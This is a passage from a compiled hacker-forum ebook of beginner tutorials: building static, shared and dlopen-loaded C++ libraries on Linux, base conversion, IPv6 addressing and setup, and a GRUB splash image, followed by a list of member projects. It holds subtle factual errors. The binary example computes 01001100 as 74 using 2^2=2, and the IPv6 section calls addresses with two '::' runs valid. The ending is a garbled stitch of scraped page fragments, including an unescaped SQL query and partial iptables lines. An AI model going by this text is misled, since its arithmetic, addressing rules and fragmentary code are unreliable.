memory. So if program A and program B is using library C, two copies of C will be in the memory.
This is of course a disadvantage when it comes to efficiency.
A shared library is linked to a program but is not put into the executable. It's loaded when the
program is started. If it's not already in memory. This is an advantage of course that a shared library
never have more than one copy in memory. So if program A and B is relinked against the shared
library D they will share a single copy of D.
The last kind of libraries is dynamic libraries. They're loaded whenever you want them to be loaded.
You don't link them into your code. But you must include the dlfcn.h header file and link your code
against libdl. You then use a function called dlopen() to load them directly in your code. Plus if two
applications loads the same library at the same time it will only exist a single copy in memory, just
like a shared library.
Okay, I think that's enough theory, now starts the fun!
Static libraries
When you create a static library you have to create a header (.h) file and a source (.c or .cpp) file.
You separate the code as in my separation tutorial. When you have your code in a source and a
header file you compile the file but do not link it. With gcc this could be accomplished like this:
Page 68
Code:
g++ -c -o libexample.o libexample.cpp
The -c option tells gcc that it should compile the code and assemble it but don't link it. Just make an
object file. When that's done all you need to do is create an archive. The static library archives is
created with the ar command:
Code:
ar rcs libexample.a libexample.o
This will create an archive called libexample.a from libexample.o. What exactly rcs means in this
case is unknown to me. But I know those are needed. Here's an example of a library which I'll call
libexample:
libexample.h:
Code:
#ifndef __LIBEXAMPLE_H__
#define __LIBEXAMPLE_H__
#include <iostream>
using namespace std;
class example {
public:
void showMsg();
};
#endif
libexample.cpp:
Code:
#include "libexample.h"
void example::showMsg() {
cout << "This is an example message from the example class.";
}
As you can see it's not anything special or overly complicated code-wise. To create a library from
this neat example write:
Code:
Page 69
g++ -c -o libexample.o libexample.cpp
ar rcs libexample.a libexample.o
Okay, now you've got a library but nothing that uses it. We need an example.cpp which includes
libexample.h and is linked against libexample.a. A simple example.cpp may look like:
Code:
int main() {
example msgobj;
msgobj.showMsg();
return 0;
}
This code isn't so special either. As you can see now, this whole thing about creating libraries is
nothing about the code and all about the compilation/linking process. At least when it's about static
or shared libraries. To compile this example code that makes use of the library we write like this:
Code:
g++ -o example example.cpp -L. -lexample
This might need a little explanation. -o as usual tells the name of the output file. -L. tells gcc to use .
(the current directory) as library path. Otherwise gcc would search /lib and /usr/lib where
libexample of course doesn't exist. -lexample links in the library example from the library path (as
set by -L.). It must be named libexample.a or else an error will occur. lib indicates it's a library
and .a indicated it's a static one. example is the name of the library.
When run this program should give the output:
Quote:
This is an example message from the example class.
Now when you've come this far it's time to show a little neat tool in Linux called readelf. It has
many options but the one where interested in here is -s. If you run readelf -s libexample.a you get
something similar to this:
Quote:
File: libexample.a(libexample.o)
Page 70
Symbol table '.symtab' contains 28 entries:
Num: Value Size Type Bind Vis Ndx Name
0: 00000000 0 NOTYPE LOCAL DEFAULT UND
1: 00000000 0 FILE LOCAL DEFAULT ABS libexample.cpp
2: 00000000 0 SECTION LOCAL DEFAULT 2
6: 00000168 28 FUNC LOCAL DEFAULT 2 _GLOBAL__I__ZN7example7sh
8: 00000000 267 FUNC LOCAL DEFAULT 2 _ZSt17__verify_groupingPK
10: 00000128 63 FUNC LOCAL DEFAULT 2 _Z41__static_initializati
11: 00000000 1 OBJECT LOCAL DEFAULT 5 _ZSt8__ioinit
12: 00000184 20 FUNC LOCAL DEFAULT 2 __tcf_0
17: 00000000 39 FUNC WEAK DEFAULT 8 _ZSt3minIjERKT_S2_S2_
18: 00000000 0 NOTYPE GLOBAL DEFAULT UND __gxx_personality_v0
19: 00000000 0 NOTYPE GLOBAL DEFAULT UND _ZNKSs4sizeEv
20: 00000000 0 NOTYPE GLOBAL DEFAULT UND _ZNKSsixEj
21: 0000010c 28 FUNC GLOBAL DEFAULT 2 _ZN7example7showMsgEv
22: 00000000 0 NOTYPE GLOBAL DEFAULT UND _ZSt4cout
23: 00000000 0 NOTYPE GLOBAL DEFAULT UND _ZStlsISt11char_traitsIcE
24: 00000000 0 NOTYPE GLOBAL DEFAULT UND _ZNSt8ios_base4InitC1Ev
25: 00000000 0 NOTYPE GLOBAL DEFAULT UND __dso_handle
26: 00000000 0 NOTYPE GLOBAL DEFAULT UND __cxa_atexit
27: 00000000 0 NOTYPE GLOBAL DEFAULT UND _ZNSt8ios_base4InitD1Ev
Dig through it and check for one of the FUNC lines where the function in our class should be. In
my case it's shown as _ZN7example7showMsgEv. This way you can see what's in a library or
application as readelf can read any ELF format file. Check out the man page for more information
on readelf. (man readelf)
Page 71
One last thing here. If you want your library to be “installed” and be usable without the -L. and
being able to include your header with #include <libexample.h> instead of using double quotes, put
the header file in /usr/include and the library file (.a) in /usr/lib or /lib.
Shared libraries
Shared libraries differ from static ones by different extension (.so), by the way you create them, by
memory efficiency and by having major and minor version numbers in the filename. Like with
static libraries there's nothing complicated or special about the code. I'll just use the same code as
above.
libexample.h:
Code:
#include <iostream>
class example {
public:
void showMsg();
};
#endif
libexample.cpp:
Code:
void example::showMsg() {
cout << "This is an example message from the example class.";
}
example.cpp:
Code:
int main() {
example msgobj;
msgobj.showMsg();
return 0;
}
Now, when you're about to create your library you need to decide what major and minor version
this is. The first thing to do is compile your library's source file with a special option, -fPIC. I don't
Page 72
know what that one does as it's hard to find information on it. But it's needed. To compile your
library write like this:
Code:
g++ -fPIC -c -o libexample.o libexample.cpp
Now you've got an object file, compiled and assembled. To create your library from this file you
write:
Code:
gcc -shared -Wl,-soname,libexample.so.1 -o libexample.so.1.0 libexample.o -lc
This may look a little scary but it's not that difficult if you look closer. -shared tells gcc to create a
shared library. -Wl,-soname,libexample.so.1 defines the soname of your library. A soname is just
the name of your shared object (.so file). -o libexample.so.1.0 is the actual filename, libexample.o is
the input file (output of compilation) and -lc links in the standard c library necessary for the creation
of shared libraries. Notice that in the -soname part you write only the major version number and in
the -o part you write both major and minor version number. The version numbers are there to help
you, your computer and others to distinguish between different versions that may be totally
incompatible.
To install a shared library you will need to do a little more than with a static one. You have to place
it in /lib or /usr/lib and make a couple of symbolic links. Easiest is to take advantage of a Linux tool
called ldconfig. So copy your shared library to /usr/lib and use ldconfig:
Code:
cp libexample.so.1.0 /usr/lib
ldconfig -nv /usr/lib
Then ldconfig will make the necessary symbolical links. The v in the options list is just for seeing
some details about what's actually happening. You would think that ldconfig does everything for
you, wrong! It leaves one thing to you. You and other lazy users will most likely not use the whole
soname, you will omit the version numbers when compiling your code against the library. So we'll
need to create one link ourselves. That's done with ln:
Code:
ln -svf /usr/lib/libexample.so.1 /usr/lib/libexample.so
The s in the option list specifies that this is a symbolic link, the v is for verbose so we see whats
happening. And the f is for force to create the link even if something is there in our way. (Don't use
that option if you have a feeling that something important could be in that place.) When we've came
this far we're about to link our example application with the shared library. To do this we must first
Page 73
compile our code into an object file:
Code:
g++ -c -o example.o example.cpp
By now, you should understand the above command but in case not, -c is for compile and assemble
but not link, -o specifies the output file as example.o and the input is example.cpp. Okay, now we're
linking example.o with the shared library. I assume you've installed it as I showed before. Now,
link:
Code:
g++ -o example example.o -lexample
If you haven't installed the library you will need to add -L. between the input file and the library
specifier. -lexample links your code with the library example from the library path. (Set by -L or
else some default setting, usually /lib and /usr/lib) Then you just run example and it should output
this:
Quote:
This is an example message from the example class.
Congratulations, if you've come here you have created your first shared library. Wasn't that hard or
complicated, huh? Just one thing left in this section. Remember the tool I showed you in the end?
I'm gonna show you a new tool now. It's called ldd and will show you what shared library's a
program or shared library uses. You use it like this:
Quote:
Zelakesh# ldd libexample.so.1.0
linux-gate.so.1 => (0xb7fbd000)
libc.so.6 => /lib/tls/i686/cmov/libc.so.6 (0xb7e56000)
/lib/ld-linux.so.2 (0xb7fbe000)
Zelakesh# cd /bin
Zelakesh# ldd ls
linux-gate.so.1 => (0xb7f4e000)
librt.so.1 => /lib/tls/i686/cmov/librt.so.1 (0xb7f2f000)
libselinux.so.1 => /lib/libselinux.so.1 (0xb7f16000)
libacl.so.1 => /lib/libacl.so.1 (0xb7f0e000)
libc.so.6 => /lib/tls/i686/cmov/libc.so.6 (0xb7dbf000)
Page 74
libpthread.so.0 => /lib/tls/i686/cmov/libpthread.so.0 (0xb7da7000)
/lib/ld-linux.so.2 (0xb7f4f000)
libdl.so.2 => /lib/tls/i686/cmov/libdl.so.2 (0xb7da3000)
libattr.so.1 => /lib/libattr.so.1 (0xb7d9f000)
Easy to use, and quite helpful if you want to know your dependencies.
Dynamic Libraries
This kind of libraries are actually not a kind of library. Not it's own kind anyway. It's a shared one.
And it isn't really the libraries that's dynamic. It's the way they're loaded. They are not linked into
the code at compile-time, they're not loaded at program startup time. They are loaded when the
programmer wants them to be loaded. This achieved by a special API. You have to include the file
<dlfcn.h> and link your program with a library called libdl. This API consists of a couple of
functions. They are; dlopen(), dlclose(), dlsym() and dlerror(). Unfortunately I haven't been able to
find a way to use this technique with classes. I'll provide a link to an article about it at the bottom,
but I didn't understand it so I won't try to do it here. I will show how to do this with functions
instead. To do this I'll of course have to rewrite the library.
libexample.cpp:
Code:
#include <iostream>
extern “C” void showMsg() {

cout << "This is an example message from the example library.";
}
libexample.h:
Code:
extern “C” void showMsg();
#endif
There's only one thing you may not have seen before. The extern “C” part, that's needed to load a
function dynamically in C++. This has to do with how the functions are represented in the library
when compiled. In C they keep their name and are referenced by it. However in C++ you can
overload functions so there can be functions with the same name. When you declare a function as
extern “C” you cannot overload it, but it can be dynamically loaded as it then keeps it's name in the
compiled library. Other than that there's nothing strange here. You compile this as a shared library:
Page 75
Code:
g++ -fPIC -c -o libexample.o libexample.cpp
gcc -shared -Wl,-soname,libexample.so.1 -o libexample.so.1.0 libexample.o -lc
Notice that the commands doesn't differ from a standard shared library. If you don't understand
these commands by now, you should re-read the section about shared libraries. Now, let's see how
we modify the example program to use the library without linking with it.
Code:
#include <iostream>
#include <cstdlib>
#include <dlfcn.h>
int main() {
void *libHandle;
void (*funcHandle)(void);
char *error;
libHandle = dlopen("/root/programming/libexample/libexample.so.1.0", RTLD_LAZY);
if(!libHandle) {
cerr << dlerror();
exit(EXIT_FAILURE);
}
*(void **) (&funcHandle) = dlsym(libHandle, "showMsg");
if((error = dlerror()) != NULL) {
cerr << error;
exit(EXIT_FAILURE);
}
(*funcHandle)();
dlclose(libHandle);
return 0;
}
This code may look a little strange. But hopefully not that strange after I've explained it. Notice we
don't include libexample.h as we don't need it when we dynamically load the library. Then we have
included dlfcn.h to be able to use the dynamic loading API. The variables we're using is pointers.
funcHandle is a special type of pointer, it's a function pointer. The void before is the return type of
the function we want to point to, and the void in the parenthesis is the argument list, in this case
only a void. The error variable is used to store error messages from dlerror(). Next we open our
library with dlopen(). dlopen() returns the memory address where the library has been loaded, or in
case of an error it returns NULL. The first argument is just the path to your shared library. The
RTLD_LAZY argument is a flag specifying how the library shall be loaded. For now satisfy
yourself with that you write RTLD_LAZY as the second argument to dlopen(). I'll go trough the
flags later. After we've hopefully loaded the library we put an error check to see if we succeeded. If
it was an error we output the message to stderr, tells our OS that we failed and exits. If it wasn't we
continue to getting the actual function.
Page 76
The next row, when we call dlsym() may look kinda cryptic. In a nutshell we search the library for
our function and point to it with our pointer. The *(void **) part is a cast because dlsym returns a
different kind of void than we want. (&funcHandle) retrieves the address of our pointer. The
arguments to dlsym() is quite self explaining, first you have the handle for the library, then the
symbol name for the function. With me so far? Good, now we obviously have to check if dlerror()
returns NULL. If that's the case, we're all good, but if it doesn't we have an error. We have to save
the error in a variable because otherwise we'll lose it as dlerror() only gives you the error message
once. If we didn't have any error we're ready to execute the function. So next line runs the function
from it's function pointer. And after these things are done we have to close the library. Or we don't
have to, but it's nice behavior. Now we're ready to compile this nice little program:
Code:
g++ example.cpp -o example -ldl
example.cpp is the input file, example the output file and -ldl links with the libdl library. This
special library is necessary as it allows us to perform this dynamic loading of other libraries. Now
that you've hopefully learned how to use libraries dynamically I'll give a short section about the
flags to dlopen.
dlopen() flags
There's two kinds of flags to use as the second argument to dlopen(). Required and optional. There's
two flags in the first group, you're required to have one of these. Those are:
Quote:
RTLD_LAZY - Perform lazy binding. Only resolve symbols as the code that references them is
executed. If the symbol is never referenced, then it is never resolved. (Lazy binding is only
performed for function references; references to variables are always immediately bound when the
library is loaded.)
RTLD_NOW - If this value is specified, or the environment variable LD_BIND_NOW is set to a

nonempty string, all undefined symbols in the library are resolved before dlopen() returns. If this
cannot be done, an error is returned.
The second kind is totally optional, you can set them, but you don't have to. To use more than one
flag (You obviously have to do this if you're using the optional flags) you or them with a pipe.
Example:
Code:
libHandle = dlopen(“/lib/libh4xx.a”, RTLD_LAZY | RTLD_NODELETE);
The optional flags you can use are these:
Page 77
Quote:
RTLD_GLOBAL - The symbols defined by this library will be made available for symbol
resolution of subsequently loaded libraries.
RTLD_LOCAL - This is the converse of RTLD_GLOBAL, and the default if neither flag is
specified. Symbols defined in this library are not made available to resolve references in
subsequently loaded libraries.
RTLD_NODELETE (since glibc 2.2) - Do not unload the library during dlclose(). Consequently,
the library’s static variables are not reinitialized if the library is reloaded with dlopen() at a later
time. This flag is not specified in POSIX.1-2001.
RTLD_NOLOAD (since glibc 2.2) - Don’t load the library. This can be used to test if the library is
already resident (dlopen() returns NULL if it is not, or the library’s handle if it is resident). This
flag can also be used to promote the flags on a library that is already loaded. For example, a library
that was previously loaded with RTLD_LOCAL can be re-opened with RTLD_NOLOAD |
RTLD_GLOBAL. This flag is not specified in POSIX.1-2001.
RTLD_DEEPBIND (since glibc 2.3.4) - Place the lookup scope of the symbols in this library ahead
of the global scope. This means that a self-contained library will use its own symbols in preference
to global symbols with the same name contained in libraries that have already been loaded. This
flag is not specified in POSIX.1-2001.
Note that the list of flags and their descriptions is not my work. Those are nicked from the dlopen()
man page on my laptop. (Linux Mint Elyssa)
Summary
I hope someone will have use for this tutorial as it took me some time to write. Please spread it all
over the net, just give me credit for writing it. If something is wrong, please tell me and I'll correct
it. I wouldn't be too surprised as this is a quite big tutorial and only me and one other person have
read through it.
Page 78
General/Miscellaneous
Base Conversion Tutorial
Author: Gnome
I was surprised to find that no one has written a base conversion tutorial yet. Maybe its because its
too easy, or maybe no one cares. Either way, I will write one now for those just getting started in
computers. Once again, if you find any errors, please let me know. I'm writing all of these tuts at
3:00am so my mind might be wandering, its hard to say. Lets get started!
I'm going to be covering how to convert numbers to and from decimal, binary, hexadecimal and
BCD. The last one you may not have heard of, but I will explain later.
So base 10, you maybe already know what this is, if you don't then surprise! YOU ALREADY
KNOW IT! This is the system we count in. Numbers 0-9, you start at 0, go to 9, once you reach that
you add another column. 10-19. I shouldn't have to explain that any farther, you know how to count.
Anyways, this is what we refer to as the decimal system or base 10. The second system I'm going to
talk about is binary or base 2. This is the computers language, it is what you will be dealing with the
rest of your life if you're a computer tech. Now you may be wondering how to count in base 2,
right? Well its just like decimal only with less numbers, you have 0 and 1, thats it! So just like
before you'll start with 0 count to 1 and add another column and start over. I will show you the
binary equivalent to counting to 16 in decimal.
Decimal - Binary
0 - 0 9 - 1001
1 - 1 10 - 1010
2 - 10 11 - 1011
3 - 11 12 - 1100
4 - 100 13 - 1101
5 - 101 14 - 1110
6 - 110 15 - 1111
7 - 111 16 - 10000
8 - 1000
Did you notice a pattern? If not, then I will show it to you. We'll start with decimal once again to
make this easier to understand. Now say we have a number, 534 in decimal. For us it makes sense,
we don't even break it down. But for this tutorial we will. 534 is the same as saying you have:
Page 79
5 x 100s, 3 x 10s, 4 x 1s, right? 500 + 30 + 4 = 534
Another way to look at that is:
5 x 10^2 + 3 x 10^1 + 4 x 10^0 = 534
Some of you may say thats not true, 10^0 is 0 right? WRONG! 10^0 is 1. Anything raised to the
power of 0 is 1, don't ask me why talk to your math teacher. So if finding 534 was that easy, can't
we break other base systems down like that too? In fact we can. Lets break down the binary number
1010:
1 x 2^3 + 0 x 2^2 + 1 x 2^1 + 0 x 2^0 => 1010
Now if you actually do the calculations, you get the decimal conversion! Yes its that easy. By
breaking the binary number down, you can get the decimal equivalent of it, which would be 10.
Check it with our counting above.
What about going the other way? Well there are many ways to do that. You can do a multiplication
guess and check, or a synthetic division. Its easy if you know the quick conversions, lets take a
look:
2^7 - 2^6 - 2^5 - 2^4 - 2^3 - 2^2 - 2^1 - 2^0

128 - 64 - 32 - 16 - 8 - 4 - 2 - 1
Now do you see the pattern? Flip it around, can you see it now? You start at the right hand side, and
every time you add a column to the left side you double the number. So substitute some numbers in
there. Say you had 01001100. You have a 1 where there is 2^6 which we've written as 64, there is a
1 also at 2^3=8 and 2^2=2. Add those up what do you get? 74! That is the decimal equivalent of our
binary number.
If you're given a decimal number and you want to convert to binary, the easiest way in my opinion
is the multiplication guess and check method. Say you have 534 in decimal. The closest power of 2
we can get without going over the number is 2^9 which = 512. Subtract that from what you've
already got. 534-512=22. What is the next highest power that doesn't go over 22? 2^4=16, subtract
that from the new total. 22-16=6. Continue on down the line, now its 2^2=4. 6-4=2. 2^1=2. 2-2=0.
Once you've reached 0 you're done. Don't forget to substitute a 0 for the in between values that don't
work. So we had a 1 at 2^9, 2^4, 2^2 and 2^1 but not 2^8, 2^7, 2^6, 2^5, 2^3 or 2^0. Our number
would then be:
1 x 2^9 + 0 x 2^8 + 0 x 2^7 + 0 x 2^6 + 0 x 2^5 + 1 x 2^4 + 0 x 2^3 + 1 x 2^2 + 1 x 2^1 + 0 x 2^0
Page 80
String it together to get: 1000010110
I know that was probably a bit confusing, but read it over a few times and you should get the hang
of it. There is also another way to do this using a type of synthetic division, which works just as
well. But I will save that for another tutorial. Now lets convert binary to hexadecimal, which is base
16. You might be wondering how thats possible, there are only 0-9 numbers! You're right, so once
we hit 9 we go to A-F. So you would count 1, 2, 3..., 8, 9, A, B, C..., F You get the point.
There is a very easy way to convert binary to hexadecimal and vice versa because of how the
numbers work. Lets start by showing the binary/decimal equivalents of hexadecimals numbers.
hex - decimal - binary

0-0-0
1-1-1
2 - 2 - 10
3 - 3 - 11
4 - 4 - 100
5 - 5 - 101
6 - 6 - 110
7 - 7 - 111
8 - 8 - 1000
9 - 9 - 1001
A - 10 - 1010
B - 11 - 1011
C - 12 - 1100
D - 13 - 1101
E - 14 - 1110
F - 15 - 1111
So the equivalent of a hexadecimal F is 1111 in binary. Which means once you go to 10 in

hexadecimal you move up to 10000 in binary or 00010000 if you extend it to a full byte. There is a
pattern to this, do you see it? Maybe with another number.
Hexadecimal = 58
Binary = 01011000
CAN YOU SEE IT?! Break up the binary number into nibbles, sets of 4 bits. You get 0101 and
1000. What are the decimal equivalents to each? 0101=5 and 1000=8. Put them together you get 58.
Page 81
Its one of the easiest conversions in my opinion. This goes both ways, if you want to convert a
number from binary to hexadecimal. Break it up into nibbles and convert each nibble.
1100010000101001 = ?
1100 = C; 0100 = 4; 0010 = 2; 1001 = 9;
The hexadecimal equivalent is: C429
If you want to convert to decimal just use the way described above going from binary to decimal, or
you can do it straight from hexadecimal to decimal. The base is 16 and thats all you need to know.
Finally I will quickly describe BCD, which is Binary Coded Decimal. Its basically a way to
encoding decimal into a binary format thats different than what we talked about above. Say you
want to convert 146 base 10 to BCD. It would then be 0001 0100 0110 = 000101000110. Its the
same way we converted from hexadecimal, but with BCD you cannot leave out any leading 0's
because it takes the entire nibble to represent a BCD number. Its not commonly used, but I thought
you might want to know about it.
Thats it for this tutorial, I know I probably jumped around a lot and might have skipped some
things. Its almost 5am now, so my mind is even more gone! But I hope you enjoyed and if you have
questions, just ask
Page 82
A Brief Introduction to Ipv6
Author: Blue Devil
Since the IPv4 addresses are running out and the fact that IPv6 is soon to replace it, I thought I
should write a short introduction for IPv6 for those not familiar with it.
Address Structure
IPv4 is, as you all may know, built up of four groups ranging from 0-255 separated by a dot. Like
127.0.0.1 for localhost.
IPv6 on the other hand is build up of eight groups of four hexadecimal characters separated by a
colon.
The IPv6 version of localhost is 0000:0000:0000:0000:0000:0000:0000:0001. There are ways to
simplify this, I will go back to it later.
If some of you aren't familiar with hexadecimal digits, it's 16 characters, 0-9 and A-F.
These are two examples of valid IPv6 addresses:
Code:
A32F:5213:C032:FFF3:EEAD:31AE:3123:1896
325B:3368:0000:3F3A:99EA:9823:ADE4:1312
Simplifying of Zeros
It wouldn't be that fun to write 0000:0000:0000:0000:0000:0000:0000:0001 just to get to localhost,
there's a smart method to skip the zeros. You simply write ::1 instead.
The method works by replacing a series of zeros with just two colons.
I gave two examples of valid addresses before. One of them had a group with only zeros. That
address could be replaced by the following:
Code:
325B:3368::3F3A:99EA:9823:ADE4:1312
So, to summarize it, as long as there are just zeros in series, they can all be replaced by two colons.
So the address
Code:
3DEA:33C4:0000:1F8A:43EE:0000:CEA1:0012
Could be replaced by
Page 83
Code:
3DEA:33C4::1F8A:43EE::CEA1:0012
If a group starts with one or more zeros, these can be removed. This means that
Code:
3DEA:33C4:0000:1F8A:43EE:0000:CEA1:0012
could also be replaced by
Code:
3DEA:33C4::1F8A:43EE::CEA1:12
This is only the zeros the character group starts with.
One thing that should be noted is that you can't replace the zeros with colons in all situations.
To show an example,
Code:
33BA:0000:0000:2167:99CC:0000:CAD4:32AF
can't be replaced by
Code:
33BA::2167:99CC::CAD4:32AF
since it would be unclear and impossible for the computers to determinate which side that had two
groups of zeros.
The address could however be replaced with
Code:
33BA:0000::2167:99CC::CAD4:32AF
Page 84
Using the Addresses
To use the address in a browser you put it in square brackets. So, to visit ::1 you would write
Code:
http://[::1]/
in your address bar. This is to avoid collisions with port specification such as:
Code:
http://[::1]:8080/
Firefox already supports IPv6. Try it out if you got a local web server running by using the address
above.
Comments
This is just a simple introduction with some of the things I have learned while researching.
I made it mainly because Wikipedia's explanation, excuse me, literally sucks for beginners. Maybe
even those who aren't new with networking wouldn't understand it.
I also want to apologize if something is unclear. If I have explained something badly, just drop a
post and I'll fix it.
Page 85
A Brief Introduction to IPv6 – Part 2
Author: Blue Devil
Thought I should continue explaining things and how to set up your network at home for IPv6.
Perhaps I shouldn't really call it “brief” anymore?
Setting up IPv6 in Windows

Always plan ahead, a simple rule. If you want to activate IPv6 for your Windows, follow the
instructions below.
1. Go into classic mode of the Control Panel.

2. Go to Network Connections.
3. Right click and select Properties on the network you want to activate IPv6 on.
4. Click install in the General tab, the one that you should end up in from the start.
5. Select Protocol in the list showing.
6. There should be something like Microsoft TCP/IP Version 6 in the list. Select it and press Okay.
7. It should now load for a little, let it finish and then just close the window.
There, you are ready to go. Check cmd by using ipconfig /all to make sure it works. You should
see an entry with a IPv6 address.
Also check with ping -6 ::1 to be sure the connection works.
Note: Vista should have this pre-installed.
Setting up IPv6 for Linux

If you got Linux you should start with using ifconfig to check if there is any inet6 entry. If there
isn't, follow the instructions below.
My settings go removed after restart, but I am no pro with Linux. If someone have any idea of
making it permanent, please post it or PM me.
1. Open up a terminal and become root/superuser. Or you could use sudo, your choice.
2. Simply write modprobe ipv6 in your terminal.
3. Check with ifconfig to make sure you've got an inet6 entry with your IPv6 address.
4. Check if the connection works by typing ping6 ::1
5. If you get an error like Invalid argument, then use ping6 -I <interface> ::1
For example ping6 -I eth0 ::1
Page 86
SSH & Interfaces(Linux)
For you who got a local network with SSH and want to look “pro”, I figured I should describe how
to connect to SSH with IPv6.
Start with figuring out the IPv6 of the machine you want to connect to. Preferable with ifconfig.
Use the following string:

ssh -6 <address>%<interface>
You will only need the interface if you get the Invalid argument error.
So, how would you get the interface? Either just write your interface name, like eth0 or the index of
the interface. If you don't know know it, use ifconfig to find out.
Examples:
Code:
ssh -6 fe80::21f:3cff:fe6d:f5bb%4
ssh -6 fe80::21f:3cff:fe6d:f5bb%wlan0
If you can't connect to the SSH server, either the client or the server hasn't had its IPv6 configured
right, or IPv6 has been disabled for SSH. It isn't originally, so if it is, it's you who have done it, so
you should know how to change it back.
If you can connect to SSH with localhost, that will say
Code:
ssh -6 ::1
then you need to control that the client got IPv6. It could be your router or network devices as well,
but it is unlikely.
Comments
The addresses you get should be local addresses. I have yet not figured out to check your external
one. Perhaps a ping would do?
I am going to figure out how to set up IPv6 for apache2 soon, you'll hopefully see it soon.
Any corrections, suggestions or comments are accepted, I'll correct myself if anything is wrong.
A note to those with Windows. The interface could be needed to be specified in some cases, just use
nearly the exact method as Linux
Page 87
Changing the Grub Splash Screen
Author: 19bab79
After i started using Linux i had been searching for a way to make my grub menu look good. i had
found descriptions on how to install a new splash image, but had never gotten it to work. today i
figured out the fix and will describe how to change your grub splash image.
first you must pick an image. here is where there are a few available:
http://www.gnome-look.org/content/search.php
these images will be in xpm.gz or tar.gz format. i have only used the xpm.gz so far.
After downloading the image place it into the folder you wish (if you did not download directly to
it). i stuck mine in my boot folder. to place the image in the boot or grub folder you will probably
need to be root. (do not unpack the image, leave it in the xpm.gz or tar.gz format.)
To move the file into the folder as root, open a console and log in as root. after root type 'nautilus'
into your console (sudo nautilus if using ubuntu). the nautilus file manager will pop up with root
privileges and you can move any file as necessary.
After placing the image in the proper folder, edit your /boot/grub/menu.lst file. add the following
line into the file: splashimage=/boot/56951-boot.xpm.gz (this is the path to MY image. enter the
proper path to your image)
The descriptions before had said the path should be proceeded by the partition number to grub. this
never worked for me. if my way does not work add the partition number and see if that works. here
is an example:
splashimage=(hd0,0)/boot/56951-boot.xpm.gz
here is the very top of my file for an example:
Code:
# menu.lst - See: grub(8), info grub, update-grub(8)
# grub-install(8), grub-floppy(8),
# grub-md5-crypt, /usr/share/doc/grub
# and /usr/share/doc/grub-doc/.
splashimage=/boot/56951-boot.xpm.gz
## default num
# Set the default entry to the entry number NUM. Numbering starts from 0, and
# the entry number 0 is the default if the command is not used.
After entering the path to the image you can save the file and reboot. your image should be in place.
Page 88
Page 89
US Members Projects
The following are projects developed by US members. Weve not included the source code on some
of them but we have included links to the relevant pages where more information can be found.
Unfortunatley some of the information is vague as I (Linx) am unsure of the status of most of them.
See below for some of the many projects ongoing.
USL (Underground Systems Linux)

Underground Systems Linux distribution. Current status is unknown but its been in the making a
while. Speak to t0nedef or any of the other members with 'USL Dev' in their title on the forums.
Closecrypt Encryption System

d4de is currently working on CloseCrypt Encryption System v2.0, however, it's currently under
heavy modification. The current working version is v1.1
Name: Amr Ali (d4de)
Stable Version: 1.1
Sid Version: 2.0
Links for the source code of version 1.0.1 ......
main.c http://d4de.pastebin.com/f32bd0448
closecrypt.h http://d4de.pastebin.com/f64bb95d7
closecrypt-framework.h http://d4de.pastebin.com/f6496686d
US Post: http://www.undergroundsystems.org/forums/showthread.php?p=57311
US New Post Perl Script

Yestoi had developed the concept of a new post notification script. We have included the source
code from the original below but please be aware that many modifications have been made to this
script and can be seen here (http://www.undergroundsystems.org/forums/showthread.php?t=2968).
Most of the modifications have been done by BlackJack.
Code:
#!/usr/bin/perl
# This is a script to look up new posts on the UndergroundSystems forum. You may port it to any
other
# site, but you might want to change the regular expresions. Coded by Yestoi.
use LWP 5.64;
my $browser = LWP::UserAgent->new;
my $url = 'http://www.undergroundsystems.org';
@args = ("echo", "-ne", "\007"); #Makes bell chime | comment out with a # for windows
my $checkvalue = $browser->get( $url );
$checkvalue->content=~/<span class="time">(.+)<\/span><br \/>by <a href=\".+\" rel/;
my $time = $1;
#print "Current time of last post: $time\n"; #debug
Page 90
while(1)
{
my $response = $browser->get( $url );
die "Error", $response->status_line
unless $response->is_success;
$response->content=~/<span class="time">(.+)<\/span><br \/>by <a href=\".+\" rel/;
if ( $time ne $1 )
{
$time = $1;
$response->content=~/<td class="alt1">\s+?<a href=\".+\"\s+?title=\".+\"><.
+?>(.+)<\/.+?><\/a>/;
system(@args); #comment this out also for windows support
print "[$_]New Topic: $1\n"; # for windows support, add an '\a' inside the
string
}
sleep 30; # Waits for 30 seconds then checks US again.
}
Rapid Hacker
Programmed in VB by xyr0x, this masterpiece does exactly what it says on the tin... Im not going to
bother trying to explain it just go to the link and give it a whirl.. there is constantly new releases.
The current version is 'Rapid Hacker v4.2 Anniversary Edition'.
URL: http://www.undergroundsystems.org/forums/showthread.php?t=5428
Proxy Ripper v1.0

Programmed in VB6 by Linx, designed to rip a few proxies off of a site. This started as a string
manipulation project. There is no intention of taking this any further.
USSR
Our very own resident DJ Black.Solaris hosts this in his spare time. Various people are welcomed
and encouraged to DJ on this station. We hear nothing but good things from this project.
Page 91

LockDown - Hackers Ebook

Загружено:

Сведения о документе

Исходное описание:

Оригинальное название

Авторское право

Доступные форматы

Поделиться этим документом

Поделиться или встроить документ

Параметры публикации

Этот документ был вам полезен?

Это неприемлемый материал?

Авторское право:

Доступные форматы

LockDown - Hackers Ebook

Загружено:

Авторское право:

Доступные форматы

Page 1

Nobody's perfect. Hackers prefer to be "nobodys", so that makes us perfect

Your code can look like

$query = mysql_query("DELETE * FROM `user` WHERE `id`=$id");

$szSQL = sprintf(" DELETE FROM

And your entire user table was just saved.

// Heredoc just makes life easier

// 100 Fun Characters

for ($c = 0; $c <= $szLength; $c++){ // har har, c++

// Perform three checks to further randomize string

$randChar = substr($lvl[$level], rand(0, strlen($lvl[$level])-1), 1);

For this example to work, VBulletin has to be security trashed.

Protecting your users:

Adding & Modifying Icons on the Desktop

A few tricks for this one.

To create an icon… try the following

Right click>create icon (im stating this as it may not work)

Accessing the Control Panel...

+ Access.cpl - Accessibility options

Accessing Web Sites...

1. Try creating a redirect at http://www.cjb.net

That concludes this basic tutorial.

/sbin/iptables -A INPUT -m recent --update --name PHASE1

/sbin/iptables -A INPUT -p tcp --dport 111 -m recent --set --name PHASE1

/sbin/iptables -I INPUT -p tcp --dport 22 -m recent --rcheck --seconds 5 --name PHASE4 -j

/sbin/iptables -A INPUT -p tcp --dport 22 -j DROP

That was server-side. No on to the client.

Now we have a working port-knocking configuration.

The source for knock.exe can be found here (http://www.zeroflux.org/proj/knock/files/knock-

We will discuss the following in this article:

Port 1 - English speaking port

Operating system Identification

Obtaining Network Hardware vendor

IP Location & Tracking

Moving onto the first chapter....

Finding Active connections (Trojan Hunting)

Open up a command prompt window (Start>Run>"cmd").

Now this will display the associated PID to the application.

Before the file transfer open up a command prompt windows (Start>Run>"cmd")

Now start the file transfer

So thats how you can do it, no more questions.

This is really simple and il explain in the following chapter.

